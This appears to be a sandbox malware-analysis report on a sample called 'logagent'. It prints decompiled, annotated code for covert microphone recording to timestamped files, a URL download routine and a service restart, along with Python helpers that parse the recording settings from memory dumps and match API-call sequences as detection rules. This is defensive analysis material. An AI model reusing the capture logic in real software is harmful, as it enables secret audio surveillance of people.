                                  					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                  					_a15 = 1;
                                  				}
                                  				_t99 =  *0x4154ec;
                                  				 *_t99(_v16);
                                  				 *_t99(_v8);
                                  				return _a15;
                                  			}
                                  0x10553eea
                                  0x10553ef3
                                  0x10553ef7
                                  0x10553efb
                                  0x10553f02
                                  0x10553f09
                                  0x10553f0b
                                  0x10553f1c
                                  0x10553f20
                                  0x10553f28
                                  0x10553f2b
                                  0x10553f32
                                  0x10553f35
                                  0x10553f38
                                  0x10553f4b
                                  0x10553f53
                                  0x00000000
                                  0x00000000
                                  0x10553f5c
                                  0x10553f5f
                                  0x10553f60
                                  0x10553f65
                                  0x10553f67
                                  0x10553f6e
                                  0x10553f75
                                  0x10553f7b
                                  0x10553f7e
                                  0x10553f89
                                  0x10553f8f
                                  0x10553f99
                                  0x10553f99
                                  0x10553f9b
                                  0x10553fa4
                                  0x10553faa
                                  0x10553fad
                                  0x10553fad
                                  0x10553fb1
                                  0x10553fb3
                                  0x10553fb9
                                  0x10553fc1
                                  0x10553fc7
                                  0x10553fd1
                                  0x10553fd3
                                  0x10553fd7
                                  0x10553fdb
                                  0x10553fe1
                                  0x10553fe6
                                  0x10553fee

                                  APIs
                                  • InternetOpenA.WININET(00416C68,00000001,00000000,00000000,00000000), ref: 10553F0B
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10553F20
                                  • InternetReadFile.WININET(?,?,00002710,?), ref: 10553F4B
                                  • ??2@YAPAXI@Z.MSVCRT ref: 10553F60
                                  • ??3@YAXPAX@Z.MSVCRT ref: 10553F9B
                                  • ??2@YAPAXI@Z.MSVCRT ref: 10553FB3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@Open$??3@FileRead
                                  • String ID:
                                  • API String ID: 616262281-0
                                  • Opcode ID: a66c82bf94d4ad45f48ea1a47f44ef61043bedc47cbf00052cdf97e8b8865f08
                                  • Instruction ID: a1d2914f0a4d571697f7481995f09ac5e7d878ed4316e60529bded13bfa6cda9
                                  • Opcode Fuzzy Hash: a66c82bf94d4ad45f48ea1a47f44ef61043bedc47cbf00052cdf97e8b8865f08
                                  • Instruction Fuzzy Hash: 89314A31A00229AFCF15CF68D899ADF7FA5FF49750F10806AF909D7250CB70AA54DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			// waveInProc callback (decompiled). _a8 is uMsg; 0x3c0 is MM_WIM_DATA, which winmm
                                  			// sends each time a capture buffer has been filled. The *0x4153xx calls are import
                                  			// thunks the decompiler could not resolve (string and allocation helpers, by usage).
                                  			E10542FCF(void* __edx, intOrPtr _a8, char _a11) {
                                  				char _v5;
                                  				char _v12;
                                  				void* _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				char _v108;
                                  				char _v188;
                                  				char* _t38;
                                  				char* _t39;
                                  				char* _t40;
                                  				void* _t71;
                                  
                                  				 *0x415354( &_v5);
                                  				if(_a8 == 0x3c0) {                       // MM_WIM_DATA: one recorded buffer is ready
                                  					 *0x415400( &_v12, _t71);
                                  					// time()/localtime()/strftime() (see the APIs below) format a timestamp into the
                                  					// 0x50-byte _v188, which is then joined with the configured path parts to build
                                  					// the output file name.
                                  					 *0x415408( &_v188, 0x50, 0x4155c0,  *0x415404( &_v12));
                                  					 *0x415318( &_v188,  &_a11);
                                  					_t38 =  &_v76;
                                  					L10555AE1();
                                  					_t39 =  &_v108;
                                  					L10555ADB();
                                  					_t40 =  &_v60;
                                  					L10555AD5();
                                  					 *0x415328(_t40, _t40, _t39, _t39, _t38, _t38, 0x41b1e8, 0x5c, E10554124( &_v92,  &_v44), 0x4155b4);
                                  					 *0x415350();
                                  					 *0x415350();
                                  					 *0x415350();
                                  					 *0x415350();
                                  					 *0x415348();
                                  					// E10542D4D is handed the WAVEHDR at 0x41b1a0 (the buffer just filled) and creates
                                  					// the output file (CreateFileW with GENERIC_WRITE, CREATE_ALWAYS in the subcall).
                                  					E10542D4D( *0x41532c(), 0x41b1a0);
                                  					// Release the header, attach a fresh buffer of the same length (*0x41b1d8, computed
                                  					// in E10542EA8), re-prepare and re-queue it so capture continues without a gap.
                                  					waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);   // 0x20 == sizeof(WAVEHDR)
                                  					0x41b1a0->lpData =  *0x415344();
                                  					 *0x41b1a4 =  *0x41b1d8;                // dwBufferLength
                                  					 *0x41b1a8 = 0;                         // dwBytesRecorded
                                  					 *0x41b1ac = 0;                         // dwUser
                                  					 *0x41b1b0 = 0;                         // dwFlags
                                  					 *0x41b1b4 = 0;                         // dwLoops
                                  					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  					waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                  				}
                                  				return  *0x415350();
                                  			}
                                  
                                  (Disassembly listing 0x10542fdf to 0x1054312b: only the address column survived extraction; the instruction text is not on this page.)

                                  APIs
                                  • time.MSVCRT ref: 10542FF7
                                  • localtime.MSVCRT ref: 10543001
                                  • strftime.MSVCRT ref: 10543016
                                    • Part of subcall function 10542D4D: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10542DB3
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 105430CC
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054310B
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054311A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$Header$BufferCreateFilePrepareUnpreparelocaltimestrftimetime
                                  • String ID:
                                  • API String ID: 1599079354-0
                                  • Opcode ID: 18d6cc70cc32b2794b9faa94895c5be64e3b88424e72b5cc26cd6ac8af64b8c5
                                  • Instruction ID: 6e2865b6f0f149b92f12967f0030c76ece938b5495738c5f384f01600cbb7a86
                                  • Opcode Fuzzy Hash: 18d6cc70cc32b2794b9faa94895c5be64e3b88424e72b5cc26cd6ac8af64b8c5
                                  • Instruction Fuzzy Hash: A941B77190060DEFDB00EBA0EC5DADE7F79EB48355F448036F505D61A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			// Microphone capture set-up (decompiled). Fills a WAVEFORMATEX at 0x41b218, sizes
                                  			// one capture buffer from a configuration value and starts recording; the
                                  			// callback E10542FCF then re-queues the buffer after every full chunk.
                                  			E10542EA8(void* __eflags) {
                                  				signed int _t6;
                                  				signed int _t23;
                                  				intOrPtr* _t29;
                                  				void* _t30;
                                  
                                  				_t30 = __eflags;
                                  				CreateDirectoryW( *0x41532c(), 0);           // output directory for the recordings
                                  				// WAVEFORMATEX at 0x41b218, field by field:
                                  				0x41b218->wFormatTag = 1;                     // WAVE_FORMAT_PCM
                                  				 *0x41b21a = 1;                               // nChannels       = 1 (mono)
                                  				 *0x41b21c = 0x1f40;                          // nSamplesPerSec  = 8000 Hz
                                  				 *0x41b226 = 8;                               // wBitsPerSample  = 8
                                  				 *0x41b220 = 0x1f40;                          // nAvgBytesPerSec = 8000
                                  				 *0x41b224 = 1;                               // nBlockAlign     = 1
                                  				 *0x41b228 = 0;                               // cbSize
                                  				E1054319B(0x41bcb0, _t30, 0x24);
                                  				_t6 = atoi( *0x415344());                     // configuration value; multiplied by 60 below, so a chunk length in minutes
                                  				 *_t29 = 0x30008;
                                  				// samples per chunk = nSamplesPerSec * minutes * 60; bytes = (wBitsPerSample / 8) * samples
                                  				_t23 =  *0x41b21c * _t6 * 0x3c;
                                  				 *0x41b1d0 = _t23;
                                  				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t23;
                                  				// Open the default capture device (WAVE_MAPPER = -1) with the callback at 0x401640;
                                  				// the last argument (fdwOpen) was not recovered by the decompiler.
                                  				waveInOpen(0x41b210, 0xffffffff, 0x41b218, 0x401640, 0, ??);
                                  				 *0x415340( *0x41b1d8);                       // unresolved import taking the byte count, presumably the buffer allocation
                                  				// WAVEHDR at 0x41b1a0 (0x20 bytes)
                                  				0x41b1a0->lpData =  *0x415344();
                                  				 *0x41b1a4 =  *0x41b1d8;                      // dwBufferLength
                                  				 *0x41b1a8 = 0;                               // dwBytesRecorded
                                  				 *0x41b1ac = 0;                               // dwUser
                                  				 *0x41b1b0 = 0;                               // dwFlags
                                  				 *0x41b1b4 = 0;                               // dwLoops
                                  				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                  				waveInStart( *0x41b210);                      // recording begins; MM_WIM_DATA is delivered once per full buffer
                                  				return 0;
                                  			}
                                  
                                  (Disassembly listing 0x10542ea8 to 0x10542fcc: only the address column survived extraction; the instruction text is not on this page.)

                                  APIs
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10542EB9
                                  • atoi.MSVCRT ref: 10542F0E
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 10542F51
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 10542FA7
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 10542FB6
                                  • waveInStart.WINMM ref: 10542FC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 2107868235-0
                                  • Opcode ID: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                  • Instruction ID: 8e427d1cf2f75dad540067c46b89d0e5d098ab247d33cd2c2400334c849a1b82
                                  • Opcode Fuzzy Hash: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                  • Instruction Fuzzy Hash: 9621F471640604EBC3009FA5FC5CAEA7BA5FB88390B01C57AE915CA3B0D7B85485CBCC
                                  Uniqueness

                                  Uniqueness Score: -1.00%
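
The two routines above (the set-up E10542EA8 and the MM_WIM_DATA callback E10542FCF) between them fix the recording format and the size of each chunk. The Python below is an added example, not code from this report or from the sample, that parses the WAVEFORMATEX and WAVEHDR back out of a dump region laid out like the 0x41b1a0 data area and recovers the configured chunk length. The 8 kHz, 8-bit, mono constants and the address layout come from the decompilation; the five-minute configuration value and the lpData pointer in the constructed region are assumptions.

```python
import struct
from dataclasses import dataclass

# Layout of the two winmm structures E10542EA8 fills in (x86, packed):
#   WAVEFORMATEX (18 bytes): wFormatTag, nChannels, nSamplesPerSec,
#                            nAvgBytesPerSec, nBlockAlign, wBitsPerSample, cbSize
#   WAVEHDR (32 bytes):      lpData, dwBufferLength, dwBytesRecorded, dwUser,
#                            dwFlags, dwLoops, lpNext, reserved
WAVEFORMATEX = struct.Struct("<HHIIHHH")
WAVEHDR = struct.Struct("<IIIIIIII")
WAVE_FORMAT_PCM = 1

# Globals referenced by the decompilation, all inside the 0x41b1a0.. data area
WAVEHDR_ADDR = 0x41B1A0      # WAVEHDR
SAMPLES_ADDR = 0x41B1D0      # nSamplesPerSec * minutes * 60
BUFLEN_ADDR = 0x41B1D8       # bytes per capture buffer
WFX_ADDR = 0x41B218          # WAVEFORMATEX passed to waveInOpen
REGION_BASE = WAVEHDR_ADDR   # the dump region is assumed to start here
REGION_SIZE = 0x90


@dataclass
class CaptureConfig:
    format_tag: int
    channels: int
    samples_per_sec: int
    avg_bytes_per_sec: int
    block_align: int
    bits_per_sample: int
    buffer_length: int  # WAVEHDR.dwBufferLength

    def is_consistent(self) -> bool:
        """Cross-check the PCM header fields the way winmm would."""
        return (self.format_tag == WAVE_FORMAT_PCM
                and self.block_align == self.channels * (self.bits_per_sample // 8)
                and self.avg_bytes_per_sec == self.samples_per_sec * self.block_align)

    def seconds_per_buffer(self) -> float:
        return self.buffer_length / self.avg_bytes_per_sec

    def config_minutes(self) -> int:
        """Invert the formula in E10542EA8 to recover the atoi()'d config value."""
        return self.buffer_length // (self.avg_bytes_per_sec * 60)

    def describe(self) -> str:
        ch = "mono" if self.channels == 1 else f"{self.channels}-ch"
        return (f"PCM {self.samples_per_sec} Hz {self.bits_per_sample}-bit {ch}, "
                f"{self.seconds_per_buffer():.0f} s per buffer")


def expected_buffer_bytes(samples_per_sec: int, bits_per_sample: int, minutes: int) -> int:
    # E10542EA8: samples = nSamplesPerSec * atoi(cfg) * 0x3c;
    #            bufsize = (wBitsPerSample >> 3) * samples
    return (bits_per_sample >> 3) * samples_per_sec * minutes * 60


def build_sample_region(minutes: int) -> bytes:
    """Constructed dump of the data area using the constants from the decompilation.
    Only the minute count and the lpData heap pointer are assumed."""
    region = bytearray(REGION_SIZE)
    samples = 8000 * minutes * 60
    buflen = expected_buffer_bytes(8000, 8, minutes)
    WAVEHDR.pack_into(region, WAVEHDR_ADDR - REGION_BASE,
                      0x00300000, buflen, 0, 0, 0, 0, 0, 0)  # lpData is hypothetical
    struct.pack_into("<I", region, SAMPLES_ADDR - REGION_BASE, samples)
    struct.pack_into("<I", region, BUFLEN_ADDR - REGION_BASE, buflen)
    WAVEFORMATEX.pack_into(region, WFX_ADDR - REGION_BASE,
                           WAVE_FORMAT_PCM, 1, 8000, 8000, 1, 8, 0)
    return bytes(region)


def parse_capture_config(region: bytes, base: int = REGION_BASE) -> CaptureConfig:
    """Read the WAVEFORMATEX and WAVEHDR back out of a dump region."""
    tag, ch, rate, avg, align, bits, _cb = WAVEFORMATEX.unpack_from(region, WFX_ADDR - base)
    hdr = WAVEHDR.unpack_from(region, WAVEHDR_ADDR - base)
    cfg = CaptureConfig(tag, ch, rate, avg, align, bits, hdr[1])
    (buflen,) = struct.unpack_from("<I", region, BUFLEN_ADDR - base)
    if buflen != cfg.buffer_length:
        raise ValueError("WAVEHDR.dwBufferLength disagrees with the global at 0x41b1d8")
    return cfg


if __name__ == "__main__":
    cfg = parse_capture_config(build_sample_region(5))
    print(cfg.describe(), "-> config value", cfg.config_minutes(), "minutes")
```

Against a real dump, point REGION_BASE at the start of the region you carved and keep the 0x41bxxx addresses as they appear in the decompilation; the consistency check catches a region that was carved at the wrong offset, and config_minutes() gives the per-file recording length without having to locate the configuration string itself.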

                                  C-Code - Quality: 42%
                                  			// Stop and restart a named service through the SCM (decompiled). Returns a status:
                                  			// 0 = service not found, 2 = the stop request failed, otherwise a value that
                                  			// encodes whether StartServiceW succeeded.
                                  			E10553156(void* _a4) {
                                  				intOrPtr _v28;
                                  				struct _SERVICE_STATUS _v32;
                                  				signed int _t13;
                                  				int _t22;
                                  				void* _t25;
                                  				void* _t26;
                                  				intOrPtr* _t27;
                                  
                                  				_t22 = 0;
                                  				_t26 = OpenSCManagerW(0, 0, 0x11);                 // SC_MANAGER_CONNECT | SC_MANAGER_QUERY_LOCK_STATUS
                                  				_t25 = OpenServiceW(_t26,  *0x41532c(), 0xf003f);  // name from an unresolved string helper; SERVICE_ALL_ACCESS
                                  				if(_t25 != 0) {
                                  					if(ControlService(_t25, 1,  &_v32) != 0) {      // 1 == SERVICE_CONTROL_STOP
                                  						do {                                         // busy-wait, no Sleep, until the service
                                  							QueryServiceStatus(_t25,  &_v32);        // reports SERVICE_STOPPED (1)
                                  						} while (_v28 != 1);                         // _v28 is _v32.dwCurrentState
                                  						_t13 = StartServiceW(_t25, 0, 0);
                                  						asm("sbb eax, eax");
                                  						_t22 = ( ~_t13 & 0x000000fe) + 3;            // StartServiceW result folded into the return value
                                  					} else {
                                  						_t22 = 2;
                                  					}
                                  					_t27 =  *0x415068;                               // IAT slot, used here as CloseServiceHandle
                                  					 *_t27(_t26);
                                  					 *_t27(_t25);
                                  				} else {
                                  					CloseServiceHandle(_t26);                        // service not found: release the SCM handle only
                                  				}
                                  				 *0x415350();
                                  				return _t22;
                                  			}
                                  
                                  (Disassembly listing 0x1055315f to 0x105531e7: only the address column survived extraction; the instruction text is not on this page.)

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,10552A60), ref: 10553165
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552A60), ref: 1055317D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552A60), ref: 1055318A
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,10552A60), ref: 10553199
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: cc893da63c933595284d596cdde44f0a94fbaa846c8815915db1173caa0d243b
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 5B01C471650918EFD3006FB0EC89DFF3F6CEB8A395B008421F906D2051DB648E4ADAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%
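
The API lists of the waveIn set-up routine, its MM_WIM_DATA callback and the service-control routine above each form an ordered call sequence that is characteristic on its own. The Python below is an added example, not part of this report, that parses bullet lines in the report's own "Name.MODULE(args), ref: addr" format and matches such ordered sequences against them; the sample input is copied from this page's API lists, and the rule labels are the editor's, not the sandbox's.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample input: API lists of four function blocks, copied from this report.
AUDIO_SETUP = """
• CreateDirectoryW.KERNEL32(00000000), ref: 10542EB9
• atoi.MSVCRT ref: 10542F0E
• waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 10542F51
• waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 10542FA7
• waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 10542FB6
• waveInStart.WINMM ref: 10542FC2
"""
AUDIO_CALLBACK = """
• time.MSVCRT ref: 10542FF7
• localtime.MSVCRT ref: 10543001
• strftime.MSVCRT ref: 10543016
  • Part of subcall function 10542D4D: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10542DB3
• waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 105430CC
• waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054310B
• waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054311A
"""
SERVICE_RESTART = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,10552A60), ref: 10553165
• OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552A60), ref: 1055317D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552A60), ref: 1055318A
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,10552A60), ref: 10553199
"""
FILE_READ = """
• CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
• GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
• ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
• CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
"""

# One bullet line; "Part of subcall function X:" entries are kept, since the sandbox
# lists them in call order with the rest.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
)
HEX_ARG = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[Optional[int], ...]   # None where the sandbox logged "?"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(int(a, 16) if HEX_ARG.fullmatch(a.strip()) else None
                     for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("name"), m.group("module"), args))
    return calls


Pred = Callable[[ApiCall], bool]


def call(name: str, module: str, arg_check: Optional[Callable[[tuple], bool]] = None) -> Pred:
    def pred(c: ApiCall) -> bool:
        return (c.name == name and c.module == module
                and (arg_check is None or arg_check(c.args)))
    return pred


def matches_in_order(calls: List[ApiCall], steps: List[Pred]) -> bool:
    """True if every step matches some call, in the given order (gaps allowed)."""
    it = iter(calls)   # shared iterator: each step resumes where the previous one matched
    return all(any(step(c) for c in it) for step in steps)


SERVICE_CONTROL_STOP = 1
RULES: Dict[str, List[Pred]] = {
    "microphone capture started (waveIn)": [
        call("waveInOpen", "WINMM"), call("waveInPrepareHeader", "WINMM"),
        call("waveInAddBuffer", "WINMM"), call("waveInStart", "WINMM")],
    "timestamped file created and capture buffer re-queued": [
        call("strftime", "MSVCRT"), call("CreateFileW", "KERNEL32"),
        call("waveInAddBuffer", "WINMM")],
    "service stopped through the SCM": [
        call("OpenSCManagerW", "ADVAPI32"), call("OpenServiceW", "ADVAPI32"),
        call("ControlService", "ADVAPI32",
             lambda a: len(a) > 1 and a[1] == SERVICE_CONTROL_STOP)],
}


def classify(text: str) -> List[str]:
    calls = parse_api_lines(text)
    return [label for label, steps in RULES.items() if matches_in_order(calls, steps)]


if __name__ == "__main__":
    for name, block in [("E10542EA8", AUDIO_SETUP), ("E10542FCF", AUDIO_CALLBACK),
                        ("E10553156", SERVICE_RESTART), ("E00412DDF", FILE_READ)]:
        print(name, classify(block))
```

The order constraint is what keeps the rules from firing on ordinary code: a benign audio application also calls waveInOpen, but the combination with a minute-granularity buffer and a per-chunk CreateFileW from a strftime-built name is what the two functions above show, and a ControlService with control code 1 followed by a StartServiceW is a restart, not a clean shutdown.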

                                  C-Code - Quality: 59%
                                  			// Size-threshold watcher (decompiled). __ecx is a C++ `this`: the byte at this+0x30 is
                                  			// the loop flag, this+0x3c a mode flag, this+0x54 a std::wstring. The 64-bit threshold
                                  			// lives at 0x41b988 (low) / 0x41b98c (high); the dump shows 0x989680 = 10,000,000.
                                  			E00405532(void* __ecx) {
                                  				signed int _t8;
                                  				WCHAR* _t9;
                                  				long _t12;
                                  				void* _t21;
                                  				void* _t22;
                                  				void* _t28;
                                  
                                  				_t8 =  *0x41b988; // 0x989680
                                  				_t9 = _t8 |  *0x41b98c;
                                  				_t22 = __ecx;
                                  				if(_t9 != 0) {                                   // a threshold of 0 disables the check
                                  					 *((char*)(__ecx + 0x30)) = 0;
                                  					do {
                                  						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();   // path of the watched file (std::wstring member)
                                  						// GENERIC_READ, FILE_SHARE_READ|WRITE|DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                  						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
                                  						_t21 = _t9;
                                  						if(_t21 == 0xffffffff) {
                                  							 *((char*)(_t22 + 0x30)) = 0;          // file missing: leave the loop
                                  						} else {
                                  							_t12 = GetFileSize(_t21, 0);           // low 32 bits only, lpFileSizeHigh is NULL
                                  							_t28 = 0 -  *0x41b98c; // 0x0
                                  							// 64-bit "size >= threshold" as rendered by the decompiler
                                  							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
                                  								 *((char*)(_t22 + 0x30)) = 1;      // stay in the loop while the file is over the limit
                                  								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
                                  									E00405D50(_t22);
                                  								}
                                  								Sleep(0x2710);                     // poll every 10 s
                                  							}
                                  							_t9 = CloseHandle(_t21);
                                  						}
                                  					} while ( *((char*)(_t22 + 0x30)) == 1);
                                  					// Once the file is below the limit or gone: if this+0x3c is clear and the configuration
                                  					// byte at 0x41b154 is '1' (0x31), copy the string at this+0x54 and hand it to E00405180.
                                  					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
                                  						return E00405180(_t22);
                                  					}
                                  				}
                                  				return _t9;
                                  			}
                                  
                                  (Disassembly listing 0x00405532 to 0x004055e6: only the address column survived extraction; the instruction text is not on this page.)

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3524115370-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 105554B8
                                    • Part of subcall function 10555557: RegisterClassExA.USER32(00000030), ref: 1055559D
                                    • Part of subcall function 10555557: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 105555B8
                                    • Part of subcall function 10555557: GetLastError.KERNEL32(?,00000000), ref: 105555C2
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 105554EF
                                  • lstrcpyn.KERNEL32(0041C218,00000040), ref: 10555507
                                  • Shell_NotifyIcon.SHELL32(00000000,0041C200), ref: 1055551D
                                  • TranslateMessage.USER32(?), ref: 1055553A
                                  • DispatchMessageA.USER32(?), ref: 10555544
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: IconMessage$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 969601869-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 38412bd8fbca00535a23dd265aa81f677f25aef7e69c69943dba909195d6325c
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DF115EB2841229BBD7109BD0EC8CFDB3FBCEB89355F008162B619D2060D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			// Read a whole file into a std::string (decompiled). _a4 is the wide path, _a8 the string
